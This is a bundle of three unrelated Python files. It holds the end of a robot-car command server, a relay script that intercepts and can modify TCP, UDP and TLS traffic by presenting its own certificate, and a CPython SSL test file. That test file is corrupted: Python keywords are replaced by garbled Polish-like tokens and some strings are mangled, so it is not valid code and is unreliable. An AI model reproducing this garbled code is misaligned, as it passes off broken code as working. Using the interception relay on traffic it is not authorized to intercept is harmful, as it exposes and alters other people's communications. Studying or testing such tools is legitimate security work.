                print(AllData)
                if len(AllData) < 5:
                    restCmd=AllData
                    # empty read means the client closed the connection
                    if restCmd=='' and self.tcp_Flag:
                        self.Reset()
                        break
                restCmd=""
                if AllData=='':
                    break
                else:
                    cmdArray=AllData.split("\n")
                    # last element is an incomplete command; carry it over
                    if(cmdArray[-1] != ""):
                        restCmd=cmdArray[-1]
                    cmdArray=cmdArray[:-1]
                    for oneCmd in cmdArray:
                        data=oneCmd.split("#")
                        if data==None:
                            continue
                        elif cmd.CMD_MODE in data:
                            # NOTE(review): the text/number pairings look
                            # inconsistent ('two'/"3", 'four'/"2") --
                            # confirm against the client protocol.
                            if data[1]=='one' or data[1]=="1":
                                self.stopMode()
                                self.Mode='one'
                            elif data[1]=='two' or data[1]=="3":
                                self.stopMode()
                                self.Mode='two'
                                self.lightRun=Thread(target=self.light.run)
                                self.lightRun.start()
                            elif data[1]=='three' or data[1]=="4":
                                self.stopMode()
                                self.Mode='three'
                                self.ultrasonicRun=threading.Thread(target=self.ultrasonic.run)
                                self.ultrasonicRun.start()
                            elif data[1]=='four' or data[1]=="2":
                                self.stopMode()
                                self.Mode='four'
                                self.infraredRun=threading.Thread(target=self.infrared.run)
                                self.infraredRun.start()
                        elif (cmd.CMD_MOTOR in data) and self.Mode=='one':
                            # manual drive: four wheel PWM values
                            try:
                                data1=int(data[1])
                                data2=int(data[2])
                                data3=int(data[3])
                                data4=int(data[4])
                                # NOTE(review): data2 is tested twice and
                                # data4 never -- looks like a typo.  Also,
                                # int() never returns None; the int()
                                # calls above raise on bad input instead.
                                if data1==None or data2==None or data2==None or data3==None:
                                    continue
                                self.PWM.setMotorModel(data1,data2,data3,data4)
                            except:
                                pass
                        elif cmd.CMD_SERVO in data:
                            # servo channel + angle
                            try:
                                data1=data[1]
                                data2=int(data[2])
                                if data1==None or data2==None:
                                    continue
                                self.servo.setServoPwm(data1,data2)
                            except:
                                pass
                        elif cmd.CMD_LED in data:
                            # LED index + RGB
                            try:
                                data1=int(data[1])
                                data2=int(data[2])
                                data3=int(data[3])
                                data4=int(data[4])
                                # NOTE(review): same duplicated data2 /
                                # missing data4 check as CMD_MOTOR.
                                if data1==None or data2==None or data2==None or data3==None:
                                    continue
                                self.led.ledIndex(data1,data2,data3,data4)
                            except:
                                pass
                        elif cmd.CMD_LED_MOD in data:
                            # NOTE(review): Led_Mode is a local of this
                            # method -- stop_thread(Led_Mode) raises
                            # (and is swallowed) until a mode thread has
                            # been started in this same call.
                            self.LedMoD=data[1]
                            if self.LedMoD== '0':
                                try:
                                    stop_thread(Led_Mode)
                                except:
                                    pass
                                self.led.ledMode(self.LedMoD)
                                time.sleep(0.1)
                                self.led.ledMode(self.LedMoD)
                            else :
                                try:
                                    stop_thread(Led_Mode)
                                except:
                                    pass
                                time.sleep(0.1)
                                Led_Mode=Thread(target=self.led.ledMode,args=(data[1],))
                                Led_Mode.start()
                        elif cmd.CMD_SONIC in data:
                            # toggle periodic ultrasonic reporting
                            if data[1]=='1':
                                self.sonic=True
                                self.ultrasonicTimer = threading.Timer(0.5,self.sendUltrasonic)
                                self.ultrasonicTimer.start()
                            else:
                                self.sonic=False
                        elif cmd.CMD_BUZZER in data:
                            try:
                                self.buzzer.run(data[1])
                            except:
                                pass
                        elif cmd.CMD_LIGHT in data:
                            # toggle periodic light-sensor reporting
                            if data[1]=='1':
                                self.Light=True
                                self.lightTimer = threading.Timer(0.3,self.sendLight)
                                self.lightTimer.start()
                            else:
                                self.Light=False
                        elif cmd.CMD_POWER in data:
                            # one-shot battery voltage report (ADC x3 divider)
                            ADC_Power=self.adc.recvADC(2)*3
                            try:
                                self.send(cmd.CMD_POWER+'#'+str(ADC_Power)+'\n')
                            except:
                                pass
        except Exception as e:
            print(e)
        self.StopTcpServer()
    def sendUltrasonic(self):
        # Timer callback: report distance while enabled, then re-arm.
        if self.sonic==True:
            ADC_Ultrasonic=self.ultrasonic.get_distance()
            # NOTE(review): measures twice and only sends when both
            # readings agree -- presumably a crude debounce; confirm.
            if ADC_Ultrasonic==self.ultrasonic.get_distance():
                try:
                    self.send(cmd.CMD_SONIC+"#"+str(ADC_Ultrasonic)+'\n')
                except:
                    # client gone: stop reporting
                    self.sonic=False
            self.ultrasonicTimer = threading.Timer(0.13,self.sendUltrasonic)
            self.ultrasonicTimer.start()
    def sendLight(self):
        # Timer callback: report both light sensors while enabled, re-arm.
        if self.Light==True:
            ADC_Light1=self.adc.recvADC(0)
            ADC_Light2=self.adc.recvADC(1)
            try:
                self.send(cmd.CMD_LIGHT+'#'+str(ADC_Light1)+'#'+str(ADC_Light2)+'\n')
            except:
                # client gone: stop reporting
                self.Light=False
            self.lightTimer = threading.Timer(0.17,self.sendLight)
            self.lightTimer.start()
    def Power(self):
        # Low-battery watchdog: beep 4x below 6.8V, 2x below 7V.
        while True:
            ADC_Power=self.adc.recvADC(2)*3
            time.sleep(3)
            if ADC_Power < 6.8:
                for i in range(4):
                    self.buzzer.run('1')
                    time.sleep(0.1)
                    self.buzzer.run('0')
                    time.sleep(0.1)
            elif ADC_Power< 7:
                for i in range(2):
                    self.buzzer.run('1')
                    time.sleep(0.1)
                    self.buzzer.run('0')
                    time.sleep(0.1)
            else:
                self.buzzer.run('0')
if __name__=='__main__':
    # Start the robot-car server and its video/command threads.
    serv = Server()
    serv.Reset()
|
mitm_relay.py | #!/usr/bin/env python
import sys
import socket
import ssl
import os
import requests
import argparse
import time
import string
from BaseHTTPServer import HTTPServer, BaseHTTPRequestHandler
from threading import Thread
from select import select
# Local echo web server used to hand intercepted traffic to the HTTP proxy.
BIND_WEBSERVER = ('127.0.0.1', 49999)
# Socket read chunk size in bytes.
BUFSIZE = 4096
__prog_name__ = 'mitm_relay'
__version__ = 0.4
def main():
    # Parse the CLI, validate relay specs, optionally start the local
    # interception web server, then spawn one listener thread per relay.
    # Python 2 source (print statements).
    parser = argparse.ArgumentParser(description='%s version %.2f' % (__prog_name__, __version__))
    parser.add_argument('-l', '--listen',
        action='store',
        metavar='<listen>',
        dest='listen',
        help='Address the relays will listen on. Default: 0.0.0.0',
        default='0.0.0.0')
    parser.add_argument('-r', '--relay',
        action='append',
        nargs='+',
        metavar='<relay>',
        dest='relays',
        help='''Create new relays.
            Several relays can be created by repeating the paramter.
            If the protocol is omitted, TCP will be assumed.
            Format: [udp:|tcp:]lport:rhost:rport''',
        required=True)
    parser.add_argument('-s', '--script',
        action='store',
        metavar='<script>',
        dest='script',
        type=argparse.FileType('r'),
        help='''Python script implementing the handle_request() and
            handle_response() functions (see example). They will be
            called before forwarding traffic to the proxy, if specified.''',
        default=False)
    parser.add_argument('-p', '--proxy',
        action='store',
        metavar='<proxy>',
        dest='proxy',
        help='''Proxy to forward all requests/responses to.
            If omitted, traffic will only be printed to the console
            (monitoring mode unless a script is specified).
            Format: host:port''',
        default=False)
    parser.add_argument('-c', '--cert',
        action='store',
        metavar='<cert>',
        dest='cert',
        type=argparse.FileType('r'),
        help='Certificate file to use for SSL/TLS interception',
        default=False)
    parser.add_argument('-k', '--key',
        action='store',
        metavar='<key>',
        dest='key',
        type=argparse.FileType('r'),
        help='Private key file to use for SSL/TLS interception',
        default=False)
    parser.add_argument('-cc', '--clientcert',
        action='store',
        metavar='<clientcert>',
        dest='clientcert',
        type=argparse.FileType('r'),
        help='Client certificate file to use for connecting to server',
        default=False)
    parser.add_argument('-ck', '--clientkey',
        action='store',
        metavar='<clientkey>',
        dest='clientkey',
        type=argparse.FileType('r'),
        help='Client private key file to use for connecting to server',
        default=False)
    cfg = parser.parse_args()
    cfg.prog_name = __prog_name__
    # flatten the list-of-lists produced by action='append' + nargs='+'
    relays = [item for sublist in cfg.relays for item in sublist]
    cfg.relays = []
    for r in relays:
        r = r.split(':')
        try:
            if len(r) == 3:
                # protocol omitted: default to TCP
                cfg.relays.append(('tcp', int(r[0]), r[1], int(r[2])))
            elif len(r) == 4 and r[0] in ['tcp', 'udp']:
                cfg.relays.append((r[0], int(r[1]), r[2], int(r[3])))
            else:
                # bare raise (no active exception) -> TypeError, caught below
                raise
            if r[0] == 'udp' and cfg.listen.startswith('127.0.0'):
                print color("[!] In UDP, it's not recommended to bind to 127.0.0.1. If you see errors, try to bind to your LAN IP address instead.", 1)
        except:
            sys.exit('[!] error: Invalid relay specification, see help.')
    if not (cfg.cert and cfg.key):
        print color("[!] Server cert/key not provided, SSL/TLS interception will not be available.", 1)
    if not (cfg.clientcert and cfg.clientkey):
        print color("[!] Client cert/key not provided.", 1)
    # There is no point starting the local web server
    # if we are not going to intercept the req/resp (monitor only).
    if cfg.proxy:
        start_ws()
    else:
        print color("[!] Interception disabled! %s will run in monitoring mode only." % __prog_name__, 1)
    # If a script was specified, import it
    if cfg.script:
        try:
            from imp import load_source
            cfg.script_module = load_source(cfg.script.name, cfg.script.name)
        except Exception as e:
            print color("[!] %s" % str(e))
            sys.exit()
    # one daemon listener thread per relay
    server_threads = []
    for relay in cfg.relays:
        server_threads.append(Thread(target=create_server, args=(relay, cfg)))
    for t in server_threads:
        t.setDaemon(True)
        t.start()
        time.sleep(.2)
    # park the main thread; Ctrl-C exits
    while True:
        try:
            time.sleep(100)
        except KeyboardInterrupt:
            sys.exit("\rExiting...")
class RequestHandler(BaseHTTPRequestHandler):
    """
    Echo handler for the local interception web server: replies 200 and
    mirrors the request body back, for every method.  The upstream proxy
    (e.g. Burp) edits the request/response in between.
    """
    def do_GET(self):
        # read exactly Content-Length bytes of body (0 if absent)
        content_length = self.headers.getheaders('content-length')
        length = int(content_length[0]) if content_length else 0
        body = self.rfile.read(length)
        self.send_response(200)
        self.end_headers()
        self.wfile.write(body)
        return
    def log_message(self, format, *args):
        # silence the default per-request stderr logging
        return
    # all methods behave identically
    do_POST = do_GET
    do_PUT = do_GET
    do_DELETE = do_GET
def start_ws():
    # Start the local echo web server on a daemon thread.
    print '[+] Webserver listening on', BIND_WEBSERVER
    server = HTTPServer(BIND_WEBSERVER, RequestHandler)
    try:
        t = Thread(target=server.serve_forever)
        t.daemon = True
        t.start()
    except KeyboardInterrupt:
        server.shutdown()
def color(txt, code = 1, modifier = 0):
    """
    Wrap *txt* in an ANSI SGR colour escape sequence.

    :param txt: text to colourise.
    :param code: colour digit (foreground becomes 30+code; 1 = red).
    :param modifier: SGR modifier (0 = normal, 1 = bold).
    """
    return "\033[{:d};3{:d}m{}\033[0m".format(modifier, code, txt)
def data_repr(data):
    # Render traffic for the console: printable payloads verbatim,
    # binary payloads as a classic hex dump.  Python 2: iterating a str
    # yields 1-byte strings, hence ord()/xrange below.
    def hexdump(src, length=0x10):
        lines = []
        for c in xrange(0, len(src), length):
            lines.append("%08x: %-*s |%s|\n" %
                (c, length*3,
                ' '.join('%02x' % ord(x) for x in src[c:c+length]),
                ''.join(x if 0x20 < ord(x) < 0x7f else '.' for x in src[c:c+length]))
                )
        return ''.join(lines)
    if all(c in string.printable for c in data):
        return '\n'+data
    else:
        return '\n'+hexdump(data)
# STARTTLS interception code based on:
# https://github.com/ipopov/starttls-mitm
def do_relay_tcp(client_sock, server_sock, cfg):
    # Pump bytes in both directions between client and server, routing
    # each chunk through proxify().  Upgrades both sides to TLS when a
    # client handshake is sniffed.
    server_sock.settimeout(1.0)
    client_sock.settimeout(1.0)
    server_peer = server_sock.getpeername()
    client_peer = client_sock.getpeername()
    while True:
        # Peek (without consuming) for the start of a TLS handshake:
        # record type 0x16 (handshake), version major 0x03.
        try:
            packet = client_sock.recv(BUFSIZE, socket.MSG_PEEK | socket.MSG_DONTWAIT)
            if packet.startswith('\x16\x03'): # SSL/TLS Handshake.
                if not (cfg.cert and cfg.key):
                    print color("[!] SSL/TLS handshake detected, provide a server cert and key to enable interception.", 1)
                else:
                    print color('------------------ Wrapping sockets ------------------', 2)
                    # server-side TLS towards the real client
                    client_sock = ssl.wrap_socket(client_sock, server_side=True, suppress_ragged_eofs=True, certfile=cfg.cert.name, keyfile=cfg.key.name)
                    # Use client-side cert/key if provided.
                    if (cfg.clientcert and cfg.clientkey):
                        server_sock = ssl.wrap_socket(server_sock, suppress_ragged_eofs=True, certfile=cfg.clientcert.name, keyfile=cfg.clientkey.name)
                    else:
                        server_sock = ssl.wrap_socket(server_sock, suppress_ragged_eofs=True)
        except:
            # no pending data / not a handshake - keep relaying as-is
            pass
        receiving, _, _ = select([client_sock, server_sock], [], [])
        try:
            if client_sock in receiving:
                data_out = client_sock.recv(BUFSIZE)
                if not len(data_out): # client closed connection
                    print "[+] Client disconnected", client_peer
                    client_sock.close()
                    server_sock.close()
                    break
                data_out = proxify(data_out, cfg, client_peer, server_peer, to_server=True)
                server_sock.send(data_out)
            if server_sock in receiving:
                data_in = server_sock.recv(BUFSIZE)
                if not len(data_in): # server closed connection
                    print "[+] Server disconnected", server_peer
                    client_sock.close()
                    server_sock.close()
                    break
                data_in = proxify(data_in, cfg, client_peer, server_peer, to_server=False)
                client_sock.send(data_in)
        except socket.error as e:
            print color("[!] %s" % str(e))
def do_relay_udp(relay_sock, server, cfg):
    # Single-socket UDP relay: datagrams from the server address are
    # forwarded to the last-seen client, anything else is treated as a
    # new/current client and forwarded to the server.
    client = None
    while True:
        receiving, _, _ = select([relay_sock], [], [])
        if relay_sock in receiving:
            data, addr = relay_sock.recvfrom(BUFSIZE)
            if addr == server:
                # server -> client direction
                data = proxify(data, cfg, client, server, to_server=False)
                relay_sock.sendto(data, client)
            else:
                # client -> server direction; remember the client address
                client = addr
                data = proxify(data, cfg, client, server, to_server=True)
                relay_sock.sendto(data, server)
def proxify(message, cfg, client_peer, server_peer, to_server=True):
    # Run one chunk of traffic through the user script and/or the HTTP
    # proxy (via the local echo web server), print it, and return the
    # possibly-modified chunk.
    def get_response():
        # POST the chunk to the local web server through the proxy; the
        # echoed (possibly edited) body comes back as the new message.
        # `headers` is taken from the enclosing scope - it is only bound
        # in the cfg.proxy branch below, which is the only caller.
        try:
            return requests.post('http://%s:%d/%s/%s/%d' %
                (BIND_WEBSERVER[0], BIND_WEBSERVER[1],
                ('CLIENT_REQUEST/to' if to_server else 'SERVER_RESPONSE/from'),
                server_peer[0], server_peer[1]),
                proxies={'http': cfg.proxy},
                headers=headers,
                data=message).content
        except requests.exceptions.ProxyError:
            print color("[!] error: can't connect to proxy!", 1)
            return message
    """
    Modify traffic here
    Send to our own parser functions, to the proxy, or both.
    """
    server_str = color('%s:%d' % server_peer, 4, 1)
    client_str = color('%s:%d' % client_peer, 6, 1)
    date_str = color(time.strftime("%a %d %b %H:%M:%S", time.gmtime()), 5, 1)
    modified_str = color('(modified!)', 2, 1)
    modified = False
    # 1) user script hooks
    if cfg.script:
        new_message = message
        if to_server and hasattr(cfg.script_module, 'handle_request'):
            new_message = cfg.script_module.handle_request(message)
        if not to_server and hasattr(cfg.script_module, 'handle_response'):
            new_message = cfg.script_module.handle_response(message)
        if new_message == None:
            print color('[!] Error: make sure handle_request and handle_response both return a message.', 1)
            new_message = message
        if new_message != message:
            modified = True
            message = new_message
    # 2) HTTP proxy round-trip
    if cfg.proxy:
        # None values suppress requests' default headers
        headers = {u'User-Agent': None, u'Accept': None, u'Accept-Encoding': None, u'Connection': None}
        headers['X-Mitm_Relay-To'] = '%s:%d' % (server_peer if to_server else client_peer)
        headers['X-Mitm_Relay-From'] = '%s:%d' % (client_peer if to_server else server_peer)
        new_message = get_response()
        if new_message != message:
            modified = True
            message = new_message
    # 3) console output
    if to_server:
        msg_str = color(data_repr(message), 3, 1)
        print "C >> S [ %s >> %s ] [ %s ] [ %d ] %s %s\n" % (client_str, server_str, date_str, len(message), modified_str if modified else '', msg_str)
    else:
        msg_str = color(data_repr(message), 3, 0)
        print "S >> C [ %s >> %s ] [ %s ] [ %d ] %s %s\n" % (server_str, client_str, date_str, len(message), modified_str if modified else '', msg_str)
    return message
def handle_tcp_client(client_sock, target, cfg):
    """
    Open the upstream connection for a newly accepted client and relay
    traffic between the two sockets until either side closes.
    """
    upstream = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    upstream.connect(target)
    do_relay_tcp(client_sock, upstream, cfg)
def create_server(relay, cfg):
    # Per-relay listener (runs on its own thread).  TCP: accept clients
    # forever, one handler thread each.  UDP: one relay socket/thread.
    proto, lport, rhost, rport = relay
    if proto == 'tcp':
        serv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        serv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
        serv.bind((cfg.listen, lport))
        serv.listen(2)
    print '[+] Relay listening on %s %d -> %s:%d' % relay
    while True:
        if proto == 'tcp':
            client, addr = serv.accept()
            dest_str = '%s:%d' % (relay[2], relay[3])
            print '[+] New client:', addr, "->", color(dest_str, 4)
            thread = Thread(target=handle_tcp_client, args=(client, (rhost, rport), cfg))
            thread.start()
        else:
            # NOTE(review): rebinding the UDP socket on every loop
            # iteration will raise EADDRINUSE on the second pass; the
            # relay itself lives in do_relay_udp's own loop.
            serv = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
            serv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
            serv.bind((cfg.listen, lport))
            thread = Thread(target=do_relay_udp, args=(serv, (rhost, rport), cfg))
            thread.start()
if __name__=='__main__':
    main()
|
test_ssl.py | # Test the support dla SSL oraz sockets
zaimportuj sys
zaimportuj unittest
z test zaimportuj support
zaimportuj socket
zaimportuj select
zaimportuj time
zaimportuj datetime
zaimportuj gc
zaimportuj os
zaimportuj errno
zaimportuj pprint
zaimportuj tempfile
zaimportuj urllib.request
zaimportuj traceback
zaimportuj asyncore
zaimportuj weakref
zaimportuj platform
zaimportuj functools
# Import ssl through test.support so the whole test module is skipped
# when the interpreter was built without ssl.
ssl = support.import_module("ssl")
PROTOCOLS = sorted(ssl._PROTOCOL_NAMES)
HOST = support.HOST
def data_file(*name):
    # Resolve *name* relative to this test module's directory.
    zwrรณฤ os.path.join(os.path.dirname(__file__), *name)
# The custom key and certificate files used in test_ssl are generated
# using Lib/test/make_ssl_certs.py.
# Other certificates are simply fetched from the Internet servers they
# are meant to authenticate.
CERTFILE = data_file("keycert.pem")
BYTES_CERTFILE = os.fsencode(CERTFILE)
ONLYCERT = data_file("ssl_cert.pem")
ONLYKEY = data_file("ssl_key.pem")
BYTES_ONLYCERT = os.fsencode(ONLYCERT)
BYTES_ONLYKEY = os.fsencode(ONLYKEY)
CERTFILE_PROTECTED = data_file("keycert.passwd.pem")
ONLYKEY_PROTECTED = data_file("ssl_key.passwd.pem")
KEY_PASSWORD = "somepass"
CAPATH = data_file("capath")
BYTES_CAPATH = os.fsencode(CAPATH)
CAFILE_NEURONIO = data_file("capath", "4e1295a3.0")
CAFILE_CACERT = data_file("capath", "5ed36f99.0")
# empty CRL
CRLFILE = data_file("revocation.crl")
# Two keys and certs signed by the same CA (for SNI tests)
SIGNED_CERTFILE = data_file("keycert3.pem")
SIGNED_CERTFILE2 = data_file("keycert4.pem")
SIGNING_CA = data_file("pycacert.pem")
SVN_PYTHON_ORG_ROOT_CERT = data_file("https_svn_python_org_root.pem")
EMPTYCERT = data_file("nullcert.pem")
BADCERT = data_file("badcert.pem")
WRONGCERT = data_file("XXXnonexisting.pem")
BADKEY = data_file("badkey.pem")
NOKIACERT = data_file("nokia.pem")
NULLBYTECERT = data_file("nullbytecert.pem")
DHFILE = data_file("dh1024.pem")
BYTES_DHFILE = os.fsencode(DHFILE)
def handle_error(prefix):
    # When running verbosely, print the current exception prefixed by *prefix*.
    exc_format = ' '.join(traceback.format_exception(*sys.exc_info()))
    jeลผeli support.verbose:
        sys.stdout.write(prefix + exc_format)
def can_clear_options():
    # OpenSSL 0.9.8m or higher
    zwrรณฤ ssl._OPENSSL_API_VERSION >= (0, 9, 8, 13, 15)
def no_sslv2_implies_sslv3_hello():
    # OpenSSL 0.9.7h or higher
    zwrรณฤ ssl.OPENSSL_VERSION_INFO >= (0, 9, 7, 8, 15)
def have_verify_flags():
    # OpenSSL 0.9.8 or higher
    zwrรณฤ ssl.OPENSSL_VERSION_INFO >= (0, 9, 8, 0, 15)
def utc_offset(): #NOTE: ignore issues like #1647654
    # local time = utc time + utc offset
    jeลผeli time.daylight oraz time.localtime().tm_isdst > 0:
        zwrรณฤ -time.altzone # seconds
    zwrรณฤ -time.timezone
def asn1time(cert_time):
    # Normalise a certificate time string for comparison.
    # Some versions of OpenSSL ignore seconds, see #18207
    # 0.9.8.i
    jeลผeli ssl._OPENSSL_API_VERSION == (0, 9, 8, 9, 15):
        fmt = "%b %d %H:%M:%S %Y GMT"
        dt = datetime.datetime.strptime(cert_time, fmt)
        dt = dt.replace(second=0)
        cert_time = dt.strftime(fmt)
        # %d adds leading zero but ASN1_TIME_print() uses leading space
        jeลผeli cert_time[4] == "0":
            cert_time = cert_time[:4] + " " + cert_time[5:]
    zwrรณฤ cert_time
# Issue #9415: Ubuntu hijacks their OpenSSL and forcefully disables SSLv2
# NOTE(review): the keywords below are mojibake of a Polish-keyword Python
# fork (jeลผeli = if, sprรณbuj = try, wyjฤ…wszy = except, podnieล = raise,
# zwrรณฤ = return, inaczej = else); tokens preserved as found.
def skip_if_broken_ubuntu_ssl(func):
    jeลผeli hasattr(ssl, 'PROTOCOL_SSLv2'):
        @functools.wraps(func)
        def f(*args, **kwargs):
            sprรณbuj:
                ssl.SSLContext(ssl.PROTOCOL_SSLv2)
            wyjฤ…wszy ssl.SSLError:
                jeลผeli (ssl.OPENSSL_VERSION_INFO == (0, 9, 8, 15, 15) oraz
                        platform.linux_distribution() == ('debian', 'squeeze/sid', '')):
                    podnieล unittest.SkipTest("Patched Ubuntu OpenSSL przerwijs behaviour")
            zwrรณฤ func(*args, **kwargs)
        zwrรณฤ f
    inaczej:
        zwrรณฤ func
# Decorator: skip a test unless the ssl module reports SNI support.
needs_sni = unittest.skipUnless(ssl.HAS_SNI, "SNI support needed dla this test")
class BasicSocketTests(unittest.TestCase):
    """ssl-module tests that do not require a live network connection."""

    def test_constants(self):
        # Merely referencing the constants verifies they exist.
        ssl.CERT_NONE
        ssl.CERT_OPTIONAL
        ssl.CERT_REQUIRED
        ssl.OP_CIPHER_SERVER_PREFERENCE
        ssl.OP_SINGLE_DH_USE
        if ssl.HAS_ECDH:
            ssl.OP_SINGLE_ECDH_USE
        if ssl.OPENSSL_VERSION_INFO >= (1, 0):
            ssl.OP_NO_COMPRESSION
        self.assertIn(ssl.HAS_SNI, {True, False})
        self.assertIn(ssl.HAS_ECDH, {True, False})

    def test_str_for_enums(self):
        # Make sure that the PROTOCOL_* constants have enum-like string
        # reprs.
        proto = ssl.PROTOCOL_SSLv23
        self.assertEqual(str(proto), '_SSLMethod.PROTOCOL_SSLv23')
        ctx = ssl.SSLContext(proto)
        self.assertIs(ctx.protocol, proto)

    def test_random(self):
        v = ssl.RAND_status()
        if support.verbose:
            sys.stdout.write("\n RAND_status is %d (%s)\n"
                             % (v, (v and "sufficient randomness") or
                                "insufficient randomness"))

        data, is_cryptographic = ssl.RAND_pseudo_bytes(16)
        self.assertEqual(len(data), 16)
        self.assertEqual(is_cryptographic, v == 1)
        if v:
            data = ssl.RAND_bytes(16)
            self.assertEqual(len(data), 16)
        else:
            self.assertRaises(ssl.SSLError, ssl.RAND_bytes, 16)

        # negative num is invalid
        self.assertRaises(ValueError, ssl.RAND_bytes, -5)
        self.assertRaises(ValueError, ssl.RAND_pseudo_bytes, -5)

        if hasattr(ssl, 'RAND_egd'):
            self.assertRaises(TypeError, ssl.RAND_egd, 1)
            self.assertRaises(TypeError, ssl.RAND_egd, 'foo', 1)
        ssl.RAND_add("this is a random string", 75.0)
        ssl.RAND_add(b"this is a random bytes object", 75.0)
        ssl.RAND_add(bytearray(b"this is a random bytearray object"), 75.0)

    @unittest.skipUnless(os.name == 'posix', 'requires posix')
    def test_random_fork(self):
        status = ssl.RAND_status()
        if not status:
            self.fail("OpenSSL's PRNG has insufficient randomness")

        rfd, wfd = os.pipe()
        pid = os.fork()
        if pid == 0:
            # Child: verify the PRNG still works after fork, ship the bytes
            # to the parent, and exit without running any test teardown.
            try:
                os.close(rfd)
                child_random = ssl.RAND_pseudo_bytes(16)[0]
                self.assertEqual(len(child_random), 16)
                os.write(wfd, child_random)
                os.close(wfd)
            except BaseException:
                os._exit(1)
            else:
                os._exit(0)
        else:
            os.close(wfd)
            self.addCleanup(os.close, rfd)
            _, status = os.waitpid(pid, 0)
            self.assertEqual(status, 0)

            child_random = os.read(rfd, 16)
            self.assertEqual(len(child_random), 16)
            parent_random = ssl.RAND_pseudo_bytes(16)[0]
            self.assertEqual(len(parent_random), 16)

            # The child's PRNG state must have diverged from the parent's.
            self.assertNotEqual(child_random, parent_random)

    def test_parse_cert(self):
        # note that this uses an 'unofficial' function in _ssl.c,
        # provided solely for this test, to exercise the certificate
        # parsing code
        p = ssl._ssl._test_decode_cert(CERTFILE)
        if support.verbose:
            sys.stdout.write("\n" + pprint.pformat(p) + "\n")
        self.assertEqual(p['issuer'],
                         ((('countryName', 'XY'),),
                          (('localityName', 'Castle Anthrax'),),
                          (('organizationName', 'Python Software Foundation'),),
                          (('commonName', 'localhost'),))
                        )
        # Note the next three asserts will fail if the keys are regenerated
        self.assertEqual(p['notAfter'], asn1time('Oct  5 23:01:56 2020 GMT'))
        self.assertEqual(p['notBefore'], asn1time('Oct  8 23:01:56 2010 GMT'))
        self.assertEqual(p['serialNumber'], 'D7C7381919AFC24E')
        self.assertEqual(p['subject'],
                         ((('countryName', 'XY'),),
                          (('localityName', 'Castle Anthrax'),),
                          (('organizationName', 'Python Software Foundation'),),
                          (('commonName', 'localhost'),))
                        )
        self.assertEqual(p['subjectAltName'], (('DNS', 'localhost'),))
        # Issue #13034: the subjectAltName in some certificates
        # (notably projects.developer.nokia.com:443) wasn't parsed
        p = ssl._ssl._test_decode_cert(NOKIACERT)
        if support.verbose:
            sys.stdout.write("\n" + pprint.pformat(p) + "\n")
        self.assertEqual(p['subjectAltName'],
                         (('DNS', 'projects.developer.nokia.com'),
                          ('DNS', 'projects.forum.nokia.com'))
                        )
        # extra OCSP and AIA fields
        self.assertEqual(p['OCSP'], ('http://ocsp.verisign.com',))
        self.assertEqual(p['caIssuers'],
                         ('http://SVRIntl-G3-aia.verisign.com/SVRIntlG3.cer',))
        self.assertEqual(p['crlDistributionPoints'],
                         ('http://SVRIntl-G3-crl.verisign.com/SVRIntlG3.crl',))

    def test_parse_cert_CVE_2013_4238(self):
        # NUL bytes embedded in certificate names must survive parsing
        # instead of silently truncating the name (CVE-2013-4238).
        p = ssl._ssl._test_decode_cert(NULLBYTECERT)
        if support.verbose:
            sys.stdout.write("\n" + pprint.pformat(p) + "\n")
        subject = ((('countryName', 'US'),),
                   (('stateOrProvinceName', 'Oregon'),),
                   (('localityName', 'Beaverton'),),
                   (('organizationName', 'Python Software Foundation'),),
                   (('organizationalUnitName', 'Python Core Development'),),
                   (('commonName', 'null.python.org\x00example.org'),),
                   (('emailAddress', 'python-dev@python.org'),))
        self.assertEqual(p['subject'], subject)
        self.assertEqual(p['issuer'], subject)
        if ssl._OPENSSL_API_VERSION >= (0, 9, 8):
            san = (('DNS', 'altnull.python.org\x00example.com'),
                   ('email', 'null@python.org\x00user@example.org'),
                   ('URI', 'http://null.python.org\x00http://example.org'),
                   ('IP Address', '192.0.2.1'),
                   ('IP Address', '2001:DB8:0:0:0:0:0:1\n'))
        else:
            # OpenSSL 0.9.7 doesn't support IPv6 addresses in subjectAltName
            san = (('DNS', 'altnull.python.org\x00example.com'),
                   ('email', 'null@python.org\x00user@example.org'),
                   ('URI', 'http://null.python.org\x00http://example.org'),
                   ('IP Address', '192.0.2.1'),
                   ('IP Address', '<invalid>'))

        self.assertEqual(p['subjectAltName'], san)

    def test_DER_to_PEM(self):
        # A PEM->DER->PEM->DER round trip must be lossless.
        with open(SVN_PYTHON_ORG_ROOT_CERT, 'r') as f:
            pem = f.read()
        d1 = ssl.PEM_cert_to_DER_cert(pem)
        p2 = ssl.DER_cert_to_PEM_cert(d1)
        d2 = ssl.PEM_cert_to_DER_cert(p2)
        self.assertEqual(d1, d2)
        if not p2.startswith(ssl.PEM_HEADER + '\n'):
            self.fail("DER-to-PEM didn't include correct header:\n%r\n" % p2)
        if not p2.endswith('\n' + ssl.PEM_FOOTER + '\n'):
            self.fail("DER-to-PEM didn't include correct footer:\n%r\n" % p2)

    def test_openssl_version(self):
        n = ssl.OPENSSL_VERSION_NUMBER
        t = ssl.OPENSSL_VERSION_INFO
        s = ssl.OPENSSL_VERSION
        self.assertIsInstance(n, int)
        self.assertIsInstance(t, tuple)
        self.assertIsInstance(s, str)
        # Some sanity checks follow
        # >= 0.9
        self.assertGreaterEqual(n, 0x900000)
        # < 3.0
        self.assertLess(n, 0x30000000)
        major, minor, fix, patch, status = t
        self.assertGreaterEqual(major, 0)
        self.assertLess(major, 3)
        self.assertGreaterEqual(minor, 0)
        self.assertLess(minor, 256)
        self.assertGreaterEqual(fix, 0)
        self.assertLess(fix, 256)
        self.assertGreaterEqual(patch, 0)
        self.assertLessEqual(patch, 63)
        self.assertGreaterEqual(status, 0)
        self.assertLessEqual(status, 15)
        # Version string as returned by {Open,Libre}SSL, the format might change
        if "LibreSSL" in s:
            self.assertTrue(s.startswith("LibreSSL {:d}.{:d}".format(major, minor)),
                            (s, t, hex(n)))
        else:
            self.assertTrue(s.startswith("OpenSSL {:d}.{:d}.{:d}".format(major, minor, fix)),
                            (s, t, hex(n)))

    @support.cpython_only
    def test_refcycle(self):
        # Issue #7943: an SSL object doesn't create reference cycles with
        # itself.
        s = socket.socket(socket.AF_INET)
        ss = ssl.wrap_socket(s)
        wr = weakref.ref(ss)
        with support.check_warnings(("", ResourceWarning)):
            del ss
            self.assertEqual(wr(), None)

    def test_wrapped_unconnected(self):
